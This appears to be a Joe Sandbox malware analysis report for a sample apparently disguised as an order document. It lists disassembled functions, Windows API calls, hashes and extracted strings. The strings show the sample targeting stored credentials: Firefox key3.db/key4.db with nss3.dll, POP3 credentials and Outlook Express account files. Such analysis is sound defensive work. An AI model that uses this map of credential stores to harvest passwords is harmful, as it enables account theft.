                                        • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                        • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                        • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                        • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                        Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                        • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                        • GetDC.USER32(00000000), ref: 004072FB
                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                        • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                        • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                        • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                        • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                        • String ID:
                                        • API String ID: 1999381814-0
                                        • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                        • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                        • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                        • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                        Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                        • API String ID: 1297977491-3883738016
                                        • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                        • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                        • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                        • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                        Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                        • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                        • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: gj
                                        • API String ID: 438689982-4203073231
                                        • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                        • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                        • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                        • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                        Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: __aulldvrm$__aullrem
                                        • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                        • API String ID: 643879872-978417875
                                        • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                        • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                        • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                        • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                        Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040DAE3
                                        • memset.MSVCRT ref: 0040DAF7
                                        • memset.MSVCRT ref: 0040DB0B
                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset$strlen$_memicmp
                                        • String ID: user_pref("
                                        • API String ID: 765841271-2487180061
                                        • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                        • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                        • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                        • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                        Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                        • memset.MSVCRT ref: 004058C3
                                        • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                        • SetFocus.USER32(?), ref: 00405976
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                        • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                        • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                        • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                        Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        • _mbscat.MSVCRT ref: 0040A8FF
                                        • sprintf.MSVCRT ref: 0040A921
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite_mbscatsprintfstrlen
                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 1631269929-4153097237
                                        • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                        • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                        • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                        • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                        Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040810E
                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,7568EB20,?), ref: 004081B9
                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                        • String ID: POP3_credentials$POP3_host$POP3_name
                                        • API String ID: 524865279-2190619648
                                        • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                        • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                        • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                        • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                        Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00406B8E
                                        • strlen.MSVCRT ref: 00406B99
                                        • strlen.MSVCRT ref: 00406BFF
                                        • strlen.MSVCRT ref: 00406C0D
                                        • strlen.MSVCRT ref: 00406BA7
                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$_mbscat_mbscpymemset
                                        • String ID: key3.db$key4.db
                                        • API String ID: 581844971-3557030128
                                        • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                        • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                        • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                        • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                        Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                        • String ID: 0$6
                                        • API String ID: 2300387033-3849865405
                                        • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                        • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                        • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                        • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                        Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004076D7
                                        • sprintf.MSVCRT ref: 00407704
                                        • strlen.MSVCRT ref: 00407710
                                        • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                        • strlen.MSVCRT ref: 00407733
                                        • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpystrlen$memsetsprintf
                                        • String ID: %s (%s)
                                        • API String ID: 3756086014-1363028141
                                        • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                        • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                        • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                        • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                        Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                        • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                        • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                        Strings
                                        • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                        • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                        • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                        • API String ID: 1640410171-3316789007
                                        • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                        • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                        • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                        • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                        Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscat$memsetsprintf
                                        • String ID: %2.2X
                                        • API String ID: 125969286-791839006
                                        • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                        • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                        • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                        • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                        Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                        • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                        • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                          • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                          • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                          • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                          • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                          • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                          • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                        • CloseHandle.KERNEL32(?), ref: 00444206
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                        • String ID: ACD
                                        • API String ID: 1886237854-620537770
                                        • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                        • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                        • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                        • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                        Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004091EC
                                        • sprintf.MSVCRT ref: 00409201
                                          • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                          • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                          • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                        • SetWindowTextA.USER32(?,?), ref: 00409228
                                        • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                        • String ID: caption$dialog_%d
                                        • API String ID: 2923679083-4161923789
                                        • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                        • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                        • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                        • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                        Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                        Strings
                                        • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                        • unknown error, xrefs: 004277B2
                                        • abort due to ROLLBACK, xrefs: 00428781
                                        • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                        • no such savepoint: %s, xrefs: 00426A02
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                        • API String ID: 3510742995-3035234601
                                        • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                        • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                        • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                        • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                        Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                        • API String ID: 2221118986-3608744896
                                        • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                        • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
